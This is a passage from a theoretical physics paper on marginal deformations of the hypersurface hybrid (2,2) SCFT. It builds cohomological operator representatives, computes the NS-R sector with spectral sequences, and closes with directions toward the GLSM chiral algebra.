In fact \({\cal O}_{\rm ac}[\xi]\) gives a well-defined map between the cohomology groups: \[{\cal O}_{\rm ac}:H^{2}(V,\Omega^{1}_{V}\otimes L)\rightarrow{ \cal H}_{\overline{\cal D}}^{\rm ac}/{\cal H}_{\overline{\cal D}}^{\rm toric}. \tag{4.17}\] It suffices to show that \({\cal O}_{\rm ac}[\bar{\partial}\eta]\) is \(\overline{\cal D}\)-exact. When \(\xi=\bar{\partial}\eta\) we can set \(\mu=P\eta\), and, using again (4.6), \[{\cal O}_{\rm ac}[\bar{\partial}\eta]=\Theta\overline{\cal D} \left(\eta_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U} ^{\overline{j}}\right)+4mP\eta_{i\overline{j}}{\cal D}^{\prime}U^{i}\overline{ \cal D}\overline{U}^{\overline{j}}=\overline{\cal D}\left(-2\Theta\eta_{i \overline{j}}{\cal D}^{\prime}U^{i}\overline{\cal D}\overline{U}^{\overline{j }}\right). \tag{4.18}\] So, we have a well-defined injective map \(H^{2}(V,\Omega^{1}_{V}\otimes L)\rightarrow{\cal H}_{\overline{\cal D}}^{\rm ac }/{\cal H}_{\overline{\cal D}}^{\rm toric}\), and we expect each of these \(\overline{\cal D}\)-cohomology classes to correspond to an (a,c) non-toric deformation of the IR theory. ### The polynomial deformations These deformations are understood as deformations of the chiral superpotential, and the corresponding (c,c) field is simply \[{\cal O}^{\rm poly}[f]=m\Phi f({\cal U})\, \tag{4.19}\] where \(f\in H^{0}(V,L^{*})\). While the operator is obviously \(\overline{\cal D}\)-closed and carries correct charges, some of these are also \(\overline{\cal D}\)-exact, as we see from the zeroth row of the spectral sequence computation of the (c,c) deformations above, which characterizes the polynomial deformations as \(H^{0}(V,L^{*})/H^{0}(V,T_{V})\). The map \(H^{0}(V,T_{V})\to H^{0}(V,L^{*})\) arises as follows. Let \(t\in{\cal A}^{0,0}(T_{V})\) be a holomorphic vector field. Because \(H^{1}(V,{\cal O}_{V})\) is empty the form \(t_{\ll}F=t^{i}F_{i\overline{j}}d\overline{u}^{\overline{j}}\) is \(\bar{\partial}\)-exact: \(t_{\ll}F=\bar{\partial}\eta\) for some \(\eta\in{\cal A}^{0,0}_{V}\), and there is a corresponding holomorphic vector field \(\mathbf{t}\in{\cal A}^{0,0}_{Y}(T_{Y})\) given by \[\mathbf{t}=t^{i}\left(\tfrac{\partial}{\partial u^{i}}-A_{i}v\right)- \eta v\, \tag{4.20}\] where \(v\) is the vertical holomorphic Killing vector \(v=\phi\tfrac{\partial}{\partial\phi}\). It is now easy to see that the function \(\mathbf{g}=\mathbf{t}_{\ll}\partial{\cal W}=\mathbf{t}^{\alpha}{\cal W}_{\alpha}\) is holomorphic and of the form \(\mathbf{g}=\phi g\) for a section \(g\in H^{0}(V,L^{*})\) given by \[g=-\eta P+t^{i}(P_{i}-A_{i}P). \tag{4.21}\] The map \(t\mapsto g\) is the desired map \(H^{0}(V,T_{V})\to H^{0}(V,L^{*})\), and corresponding to this we have \[\mathcal{O}^{\text{poly}}[g]=m\Phi g=\overline{\mathcal{D}}\left(- \tfrac{1}{2}\mathbf{t}^{\alpha}\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha} \right). \tag{4.22}\] ### The non-polynomial deformations The non-polynomial deformations can be understood in a more familiar geometric framework than the non-toric ones. The total space of the line bundle \(L\to V\) is a holomorphic manifold \(Y\), and given a deformation of complex structure of the base \(V\) we can ask the natural question whether the deformation can be lifted to a deformation of complex structure of \(Y\). 
Fortunately for us, the answer has been provided in a much wider setting in classic work from more than sixty years ago [46]: if \(\tau\) represents a class in \(H^{1}(V,T_{V})\) and \(F\) is the curvature of the line bundle, we can construct \([\tau\lrcorner F]\in H^{2}(V,\mathcal{O}_{V})\), and \(\tau\) can be lifted to a deformation of complex structure of \(Y\) if and only if \([\tau\lrcorner F]=0\). Explicitly, if there exists \(\xi\in\mathcal{A}_{V}^{0,1}\) such that
\[\tau_{\overline{k}}^{i}F_{i\overline{j}}-\tau_{\overline{j}}^{i}F_{i\overline{k}}=\partial_{\overline{k}}\xi_{\overline{j}}-\partial_{\overline{j}}\xi_{\overline{k}}\, \tag{4.23}\]
then we define \(\boldsymbol{\tau}\in\mathcal{A}_{Y}^{0,1}(T_{Y})\) by
\[\boldsymbol{\tau}=\left(\xi_{\overline{j}}v+\tau_{\overline{j}}^{i}\left(\tfrac{\partial}{\partial u^{i}}-A_{i}v\right)\right)\otimes d\overline{u}^{\overline{j}}. \tag{4.24}\]
(This is similar to our discussion of lifting a holomorphic vector \(t\) to a holomorphic vector \(\mathbf{t}\) on \(Y\).) It is easy to check that \(\bar{\partial}\boldsymbol{\tau}=0\). In our case \(\xi\) exists because \(H^{2}(V,\mathcal{O}_{V})=0\). Moreover, if \(\tau=\bar{\partial}\rho\) for some \(\rho\in\mathcal{A}_{V}^{0,0}(T_{V})\), then we can set \(\xi_{\overline{j}}=\rho^{i}F_{i\overline{j}}\), and in this case \(\boldsymbol{\tau}\) is \(\bar{\partial}\)-exact:
\[\boldsymbol{\tau}=\bar{\partial}\boldsymbol{\rho}\,\qquad\boldsymbol{\rho}=\rho^{i}\left(\tfrac{\partial}{\partial u^{i}}-A_{i}v\right). \tag{4.25}\]
Thus, we have a well-defined map on cohomology: \(H^{1}(V,T_{V})\to H^{1}(Y,T_{Y})\). Using the map \(\tau\mapsto\boldsymbol{\tau}\) and a little bit of foresight, we make an Ansatz for the corresponding (c,c) field:
\[\mathcal{O}_{\rm cc}[\tau]=\boldsymbol{\tau}_{\overline{\beta}}^{\alpha}\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}\,\overline{\mathcal{D}}\overline{\mathcal{Y}}^{\overline{\beta}}+2m\mathbf{f}\, \tag{4.26}\]
where \(\mathbf{f}\) is a function on \(Y\); we will choose \(\mathbf{f}\) presently. We then calculate, using (2.11),
\[\overline{\mathcal{D}}\mathcal{O}_{\rm cc}[\tau]=2m\left(\Phi f_{\overline{\beta}}-\boldsymbol{\tau}_{\overline{\beta}}^{\alpha}\mathcal{W}_{\alpha}\right)\overline{\mathcal{D}}\overline{\mathcal{Y}}^{\overline{\beta}}. \tag{4.27}\]
Since \(\mathcal{W}\) is a well-defined function on \(Y\),
\[\boldsymbol{\tau}\lrcorner\partial\mathcal{W}=\boldsymbol{\tau}_{\overline{\beta}}^{\alpha}\mathcal{W}_{\alpha}d\overline{y}^{\overline{\beta}}\in\mathcal{A}_{Y}^{0,1}\, \tag{4.28}\]
and explicitly it is given by
\[\boldsymbol{\tau}\lrcorner\partial\mathcal{W}=\phi\lambda\, \tag{4.29}\]
where
\[\lambda=\left(\xi_{\overline{\jmath}}P+\tau^{i}_{\overline{\jmath}}(P_{i}-A_{i}P)\right)d\overline{u}^{\overline{\jmath}}\in\mathcal{A}^{0,1}_{V}(L^{*}) \tag{4.30}\]
is \(\bar{\partial}\)-closed by (4.23). Furthermore, (10) implies \(H^{1}(V,L^{*})=0\), which means \(\lambda=\bar{\partial}\sigma\) for some \(\sigma\in\mathcal{A}^{0,0}_{V}(L^{*})\). Putting these results together it follows that
\[\boldsymbol{\tau}\lrcorner\partial\mathcal{W}=\bar{\partial}(\phi\sigma)\, \tag{4.31}\]
so that choosing \(\mathbf{f}=\phi\sigma\) leads to a \(\overline{\mathcal{D}}\)-closed field
\[\mathcal{O}_{\rm cc}[\tau]=\boldsymbol{\tau}_{\overline{\beta}}^{\alpha}\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}\,\overline{\mathcal{D}}\overline{\mathcal{Y}}^{\overline{\beta}}+2m\mathbf{f}. \tag{4.32}\]
The choice of \(\sigma\) is ambiguous up to shifts by elements of \(H^{0}(V,L^{*})\).
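To make the effect of this ambiguity explicit: under a shift \(\sigma\to\sigma+g\) with \(g\in H^{0}(V,L^{*})\), the function \(\mathbf{f}=\phi\sigma\) shifts by \(\phi g\), and the field (4.32) changes by
\[\delta\mathcal{O}_{\rm cc}[\tau]=2m\Phi g=2\,\mathcal{O}^{\rm poly}[g]\,\]
i.e. by a polynomial deformation of the form (4.19).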
Just as in the preceding discussion of the non-toric deformations, this means \(\mathcal{O}_{\rm cc}[\tau]\) is well-defined in the quotient \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}/\mathcal{H}_{\overline{\mathcal{D}}}^{\rm poly}\). It remains to show that this gives a well-defined map on cohomology:
\[\mathcal{O}_{\rm cc}:H^{1}(V,T_{V})\to\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}/\mathcal{H}_{\overline{\mathcal{D}}}^{\rm poly}\, \tag{4.33}\]
and it suffices to check that \(\mathcal{O}_{\rm cc}[\bar{\partial}\rho]\) is \(\overline{\mathcal{D}}\)-exact. But, since \(\tau=\bar{\partial}\rho\) implies \(\boldsymbol{\tau}=\bar{\partial}\boldsymbol{\rho}\), we set \(\mathbf{f}=\boldsymbol{\rho}\lrcorner\partial\mathcal{W}=\boldsymbol{\rho}^{\alpha}\mathcal{W}_{\alpha}\), and using again (10),
\[\overline{\mathcal{D}}\left(-\boldsymbol{\rho}^{\alpha}\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}\right)=\boldsymbol{\tau}_{\overline{\beta}}^{\alpha}\,\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}\,\overline{\mathcal{D}}\overline{\mathcal{Y}}^{\overline{\beta}}-\boldsymbol{\rho}^{\alpha}\overline{\mathcal{D}}\,\overline{\mathcal{D}}^{\prime}\mathcal{K}_{\alpha}=\mathcal{O}_{\rm cc}[\bar{\partial}\rho]. \tag{4.34}\]

## 5 The NS-R sector of the hypersurface hybrid

We now discuss the computation of the marginal deformations in the NS-R sector of the hybrid theory. That is, assuming the hybrid theory flows to a compact SCFT, we know that every right-moving chiral primary operator has an image as a right-moving ground state in the NS-R sector. Using the technology developed in [22] it is possible to compute all the states that correspond to massless spacetime fermions in a string compactification based on the SCFT. A subset of these states, those with \(q_{\rm L}=\pm 1\) and \(h_{\rm L}=1/2\), is isomorphic to the marginal deformations in the NS-NS sector. Since the left-moving weights can be calculated using the chiral algebra, this gives an effective way to check our results and also to check that the techniques of [22] really do apply to hypersurface hybrids. We will see that the deformations are captured by the cohomology of the right-moving supercharge \(\overline{\mathbf{Q}}\), which in the hybrid decomposes into the sum of two anticommuting operators: \(\overline{\mathbf{Q}}_{0}\), the supercharge of the base NLSM, and \(\overline{\mathbf{Q}}_{W}\), the supercharge contribution from the inclusion of the superpotential \({\cal W}=\Phi P\).
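It is worth recording why this decomposition is useful (a standard observation; we assume, as is the usual situation for a superpotential deformation, that each supercharge is separately nilpotent):
\[\overline{\mathbf{Q}}_{0}^{2}=\overline{\mathbf{Q}}_{W}^{2}=\{\overline{\mathbf{Q}}_{0},\overline{\mathbf{Q}}_{W}\}=0\quad\Longrightarrow\quad\overline{\mathbf{Q}}^{2}=0\,\]
and it is this bicomplex structure that allows the \(\overline{\mathbf{Q}}\) cohomology to be computed by the two-step spectral sequence used below.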
The (2,2) superfields are decomposed into their (0,2) components,
\[\begin{aligned}
{\cal Y}^{\alpha} &=Y^{\alpha}+\sqrt{2}\theta^{\prime}{\cal X}^{\alpha}+\theta^{\prime}\overline{\theta}^{\prime}\partial Y^{\alpha}, &\qquad \overline{\cal Y}^{\overline{\alpha}} &=\overline{Y}^{\overline{\alpha}}-\sqrt{2}\overline{\theta}^{\prime}\overline{\cal X}^{\overline{\alpha}}-\theta^{\prime}\overline{\theta}^{\prime}\partial\overline{Y}^{\overline{\alpha}},\\
Y^{\alpha} &=y^{\alpha}+\sqrt{2}\theta\eta^{\alpha}+\theta\overline{\theta}\bar{\partial}y^{\alpha}, &\qquad \overline{Y}^{\overline{\alpha}} &=\overline{y}^{\overline{\alpha}}-\sqrt{2}\overline{\theta}\overline{\eta}^{\overline{\alpha}}-\theta\overline{\theta}\bar{\partial}\overline{y}^{\overline{\alpha}},\\
{\cal X}^{\alpha} &=\chi^{\alpha}+\sqrt{2}\theta H^{\alpha}+\theta\overline{\theta}\bar{\partial}\chi^{\alpha}, &\qquad \overline{\cal X}^{\overline{\alpha}} &=\overline{\chi}^{\overline{\alpha}}+\sqrt{2}\overline{\theta}\overline{H}^{\overline{\alpha}}-\theta\overline{\theta}\bar{\partial}\overline{\chi}^{\overline{\alpha}}.
\end{aligned} \tag{5.1}\]
We identify \(y^{\alpha}\) as coordinates on the total space \(Y\) and decompose these into \((\phi,u^{i})\) as above. For the other component fields, we denote the fiber component with a 0 superscript or subscript. We use the equations of motion to eliminate the auxiliary fields and then make the following field redefinitions,
\[\overline{\chi}_{\alpha}={\cal G}_{\alpha\overline{\beta}}\overline{\chi}^{\overline{\beta}},\qquad\rho_{\alpha}={\cal G}_{\alpha\overline{\beta}}\partial\overline{y}^{\overline{\beta}}+\Gamma^{\delta}_{\alpha\beta}\overline{\chi}_{\delta}\chi^{\beta}. \tag{5.2}\]
As described in [22], in the large radius limit these degrees of freedom can be treated as a free curved \(bc\)-\(\beta\gamma\) system, while the right-moving degrees of freedom are taken in their ground states. A general state in the \(\overline{\bf Q}\) cohomology in the NS-R sector is represented by a \((0,k)\) form \(\Psi\) valued in a product bundle \((T^{*}_{Y})^{\otimes s}\otimes(T_{Y})^{\otimes t}\), contracted into \(k\) copies of the zero modes \(\overline{\eta}^{\bar{i}}\) and a combination of \(\chi^{\alpha}\), \(\overline{\chi}_{\alpha}\), and \(\rho_{\alpha}\). The charges and weights of the fields are given in the table below, and this allows us to select the states that correspond to the marginal deformations.

\begin{tabular}{|c|c|c|c|c|c|c|c|c|} \hline & \(u^{i}\) & \(\rho_{i}\) & \(\chi^{i}\) & \(\overline{\chi}_{i}\) & \(\phi\) & \(\rho_{0}\) & \(\chi^{0}\) & \(\overline{\chi}_{0}\) \\ \hline \(q_{\rm L}\) & 0 & 0 & \(-1\) & 1 & 1 & \(-1\) & 0 & 0 \\ \hline \(q_{\rm R}\) & 0 & 0 & 0 & 0 & 1 & \(-1\) & 1 & \(-1\) \\ \hline \(2h_{\rm L}\) & 0 & 2 & 1 & 1 & 1 & 1 & 2 & 0 \\ \hline \end{tabular}

### (a,c) Deformations

Given these, we construct the most general set of operators obeying our charge and weight constraints. The corresponding states are then constructed by letting these act on the NS-R Fock vacuum.
Starting with the (a,c) deformations, we find the operators that can contribute to NS-R states with \(q_{\rm L}=-1\), together with the eigenvalues of their coefficients \(\Psi\) under the Lie derivative \({\cal L}_{v}\):
\[\begin{array}{llll}
{\cal O}^{2}=\Psi_{\alpha}^{2}\chi^{\alpha}\,, & {\cal O}^{5}=\Psi_{\alpha}^{5,\beta}\overline{\chi}_{\beta}\chi^{\alpha}\,, & {\cal O}^{6}=\Psi^{6,\beta}\rho_{\beta}+\Psi_{\alpha}^{6,\beta}\overline{\chi}_{\beta}\chi^{\alpha}\,, & {\cal O}^{7}=\Psi^{7,\alpha\beta}\rho_{\alpha}\overline{\chi}_{\beta}\,,\\
{\cal L}_{v}\Psi^{2}=0\,, & {\cal L}_{v}\Psi^{5}=-\Psi^{5}\,, & {\cal L}_{v}\Psi^{6}=-\Psi^{6}\,, & {\cal L}_{v}\Psi^{7}=-2\Psi^{7}\,.
\end{array} \tag{5.3}\]
The coefficients \(\Psi\) are sections of the following bundles,
\[\Psi^{2}\in\mathcal{A}_{Y}^{0,u}(T_{Y}^{*})\,\quad\Psi^{5}\in\mathcal{A}_{Y}^{0,u}(T_{Y}^{*}\otimes T_{Y})\,\quad\Psi^{6}\in\mathcal{A}_{Y}^{0,u}(T_{Y})\,\quad\Psi^{7}\in\mathcal{A}_{Y}^{0,u}(T_{Y}\otimes T_{Y}). \tag{5.4}\]
By utilizing the decomposition \(\overline{\mathbf{Q}}=\overline{\mathbf{Q}}_{0}+\overline{\mathbf{Q}}_{W}\), we can compute the cohomology via a spectral sequence with zeroth stage \(d_{0}=\overline{\mathbf{Q}}_{0}\) and first stage \(d_{1}=\overline{\mathbf{Q}}_{W}\). We start by taking the \(d_{0}=\overline{\mathbf{Q}}_{0}\) cohomology, which acts on the component fields as \(\overline{\mathbf{Q}}_{0}=-\overline{\eta}^{\overline{\imath}}\frac{\partial}{\partial\overline{u}^{\overline{\imath}}}\) and thus forces the \(\Psi\) into cohomology groups \(H^{u}(Y,(T_{Y}^{*})^{\otimes s}\otimes(T_{Y})^{\otimes t})\), which we will shorten on the diagram to \(H^{u}(B_{s,t})\). To organize these states into a complex, we define \(p=q_{\rm R}-u\), and parameterize the complex by \((p,u)\). Below we have the first page of the spectral sequence:
\[\begin{array}{ccccccccc}
0&\to&H^{3}(Y,B_{0,2})&\to&H^{3}(Y,B_{1,1})\oplus H^{3}(Y,B_{0,1})&\to&H^{3}(Y,B_{1,0})&\to&0\\
0&\to&H^{2}(Y,B_{0,2})&\to&H^{2}(Y,B_{1,1})\oplus H^{2}(Y,B_{0,1})&\to&H^{2}(Y,B_{1,0})&\to&0\\
0&\to&H^{1}(Y,B_{0,2})&\to&H^{1}(Y,B_{1,1})\oplus H^{1}(Y,B_{0,1})&\to&H^{1}(Y,B_{1,0})&\to&0\\
0&\to&H^{0}(Y,B_{0,2})&\to&H^{0}(Y,B_{1,1})\oplus H^{0}(Y,B_{0,1})&\to&H^{0}(Y,B_{1,0})&\to&0
\end{array}\]
The states we are after correspond to \(q_{\rm R}=1\), i.e. those along the anti-diagonal \(p+u=1\). Before applying the \(d_{1}\) stage of the sequence, we make use of the sheaf cohomology results developed in appendix C of [22]. Given a section of a bundle \(\mathcal{E}\) on \(Y\) at fixed grade \(r\) in \(\phi\), we are able to find an isomorphic bundle on \(V\) in cohomology. Each of the relevant bundles on \(Y\) will have a corresponding exact sequence relating the base and fiber components of the bundle. For instance, consider the sequence for \(T_{Y}^{*}\),
\[0\to(\pi^{*}(T_{V}^{*}))_{r}\to(T_{Y}^{*})_{r}\to(\pi^{*}(L^{-1}))_{r-1}\to 0. \tag{5.5}\]
We wish to evaluate this sequence at grade \(r=0\), i.e. the eigenvalue of \(\Psi^{2}\) under \(\mathcal{L}_{v}\).
This tells us that \(T_{Y}^{*}\) at grade \(0\) is equivalent to the pullback of \(T_{V}^{*}\), which after taking cohomology allows us to use the isomorphism
\[H_{r}^{\bullet}(Y,\pi^{*}(\mathcal{E}))\simeq H^{\bullet}(V,\mathcal{E}\otimes L^{-r}) \tag{5.6}\]
to obtain
\[H_{0}^{\bullet}(Y,T_{Y}^{*})=H^{\bullet}(V,T_{V}^{*}). \tag{5.7}\]
We carry this exercise out for the remaining bundles, and are able to reduce the first page of the spectral sequence to
\[\begin{array}{ccccc}
0&H^{3}(V,L^{2})&H^{3}(V,T_{V}^{*}\otimes L)\oplus H^{3}(V,L)&H^{3}(V,T_{V}^{*})&0\\
0&H^{2}(V,L^{2})&H^{2}(V,T_{V}^{*}\otimes L)\oplus H^{2}(V,L)&H^{2}(V,T_{V}^{*})&0\\
0&H^{1}(V,L^{2})&H^{1}(V,T_{V}^{*}\otimes L)\oplus H^{1}(V,L)&H^{1}(V,T_{V}^{*})&0\\
0&H^{0}(V,L^{2})&H^{0}(V,T_{V}^{*}\otimes L)\oplus H^{0}(V,L)&H^{0}(V,T_{V}^{*})&0
\end{array}\]
From here, we can make use of various vanishing theorems and Serre duality for the cohomology of vector bundles on toric varieties. The new complex then takes the form
\[\begin{array}{ccccc}
0&0&H^{3}(V,T_{V}^{*}\otimes L)&0&0\\
0&0&H^{2}(V,T_{V}^{*}\otimes L)&0&0\\
0&0&H^{1}(V,T_{V}^{*}\otimes L)&H^{1}(V,T_{V}^{*})&0\\
0&0&H^{0}(V,T_{V}^{*}\otimes L)\oplus H^{0}(V,L)&0&0
\end{array}\]
Ultimately, we are interested in the cohomology along the diagonal corresponding to \(q_{\rm R}=1\). So, we can zoom into the relevant parts and consider the \(d_{1}=\overline{\mathbf{Q}}_{W}\) map,
\[\begin{array}{ccc}H^{2}(V,T_{V}^{*}\otimes L)&\xrightarrow{\overline{\mathbf{Q}}_{W}}&0\\ H^{1}(V,T_{V}^{*}\otimes L)&\xrightarrow{\overline{\mathbf{Q}}_{W}}&H^{1}(V,T_{V}^{*})\end{array}\]
The \(\overline{\mathbf{Q}}_{W}\) action on the component fields is given by
\[\overline{\mathbf{Q}}_{W}\cdot\overline{\chi}_{\alpha}=W_{\alpha},\quad\overline{\mathbf{Q}}_{W}\cdot\rho_{\alpha}=\chi^{\beta}W_{\beta\alpha}\, \tag{5.8}\]
and thus the \(\overline{\mathbf{Q}}_{W}\) map quotients out elements of \(H^{1}(V,T_{V}^{*}\otimes L)\) multiplied by \(P\) from \(H^{1}(V,T_{V}^{*})\), and acts by \(0\) on \(H^{2}(V,T_{V}^{*}\otimes L)\). So, the terminal stage of the spectral sequence converges to the cohomology of \(\overline{\mathbf{Q}}\), giving
\[\begin{array}{cc}H^{2}(V,T_{V}^{*}\otimes L)&0\\ H^{1}(V,T_{V}^{*}\otimes L)&\dfrac{H^{1}(V,T_{V}^{*})}{\Psi^{2}\sim\Psi^{2}+\Psi^{5}P}\end{array}\]
The bottom right corner is isomorphic to the toric deformations, while the top left gives the non-toric deformations as \(H^{2}(V,T_{V}^{*}\otimes L)\), matching our result in section 3.3.

### (c,c) Deformations

This analysis is easily extended to the (c,c) deformations. We now search for all operators with \(\mathrm{U}(1)_{\rm L}\times\mathrm{U}(1)_{\rm R}\) charges \((1,1)\) and weight \(h=\frac{1}{2}\). The full list and their \(\phi\) grading are given below.
\[\begin{array}{lll}
\mathcal{O}^{1,0}=\Psi^{1,0},&\mathcal{L}_{v}\Psi^{1,0}=\Psi^{1,0},&\Psi^{1,0}\in\mathcal{A}_{Y}^{0,u}\\
\mathcal{O}^{1,1}=\Psi^{1,1\alpha}\overline{\chi}_{\alpha},&\mathcal{L}_{v}\Psi^{1,1}=0,&\Psi^{1,1}\in\mathcal{A}_{Y}^{0,u}(T_{Y})\\
\mathcal{O}^{1,2}=\Psi^{1,2\alpha\beta}\overline{\chi}_{\alpha}\overline{\chi}_{\beta},&\mathcal{L}_{v}\Psi^{1,2}=-\Psi^{1,2},&\Psi^{1,2}\in\mathcal{A}_{Y}^{0,u}(\wedge^{2}T_{Y})
\end{array} \tag{5.9}\]
The first stage of the spectral sequence gives a complex of the same form as in the (a,c) case, where again we are interested in the cohomology along the anti-diagonal at \(q_{\rm R}=1\). Applying the same isomorphisms to this complex and utilizing Serre duality gives
\[\begin{array}{ccc}H^{1}(V,T_{V})&\xrightarrow{\overline{\mathbf{Q}}_{W}}&0\\ H^{0}(V,T_{V})\oplus H^{0}(V,\mathcal{O}_{V})&\xrightarrow{\overline{\mathbf{Q}}_{W}}&H^{0}(V,L^{*})\end{array}\]
The \(\overline{\mathbf{Q}}_{W}\) map acts as before, and on the bottom row quotients out elements of \(H^{0}(V,L^{*})\) proportional to \(\partial\mathcal{W}\). The \(d_{2}\) map would take every entry into a trivial group, so the spectral sequence already converges at this stage, and the cohomology is given by
\[\begin{array}{cc}H^{1}(V,T_{V})&0\\ H^{0}(V,T_{V})&\dfrac{H^{0}(V,L^{*})}{\Psi^{1,0}\sim\Psi^{1,0}+d\mathcal{W}\cdot\Psi^{1,1}}\end{array}\]
The bottom right gives the polynomial deformations, while the non-polynomial deformations are given in the top left by \(H^{1}(V,T_{V})\), as expected.

## 6 Further directions

In this paper we investigated a UV Lagrangian theory, the hypersurface hybrid, which is expected to flow to a compact (2,2) SCFT. We established two main results. First, we obtained explicit representatives for all marginal operators of the SCFT in terms of cohomology classes in the chiral algebra \({\cal H}_{\overline{\cal D}}\). Second, we demonstrated that although the hypersurface hybrid is a rather degenerate example of a hybrid theory, nevertheless the hybrid methodology can be used to study its NS-R sector.

While our results certainly settle some questions of principle, they also bear on practical matters. First, our construction of representatives of the non-toric and non-polynomial marginal operators could be used to evaluate correlation functions of all marginal operators in the theory, and perhaps they could already play a role in the mathematical formulations of topological field theories as in [19, 21, 47]. This will require an analysis of quantum corrections to our results, which are probably best analyzed in the language of the curved \(bc\)-\(\beta\gamma\) system that encodes the chiral algebra of the hybrid theory [22]. It seems reasonable to conjecture that the quantum corrections to the form of the operators we gave can be absorbed into a redefinition of the Kähler potential \({\cal K}\), which made its appearance in the construction through the superfield \(\Theta\). Of course there would be non-perturbative corrections to the OPE of the (a,c) operators, and it would be extremely interesting to understand these directly in terms of the hybrid theory. The results obtained recently in [23] should be of use in uncovering these quantum corrections.

More importantly, this work is a step towards a more ambitious UV lift of the infinitesimal deformations to the gauged linear sigma model. Our construction of the operators was given in a particular large radius phase of the GLSM, and it relied on a number of geometric properties of this phase.
It would be interesting to study the chiral algebra of the GLSM in detail in order to find the non-toric and non-polynomial deformations in that UV description. We hope that our explicit representatives might serve as a guide to finding that structure, which by its nature will be combinatoric rather than geometric and will require some further developments of the gauged linear sigma model's chiral algebra. Whatever the motivation for those explorations, a systematic understanding of the GLSM chiral algebra will be of great use to future generations of linear sigma model experts.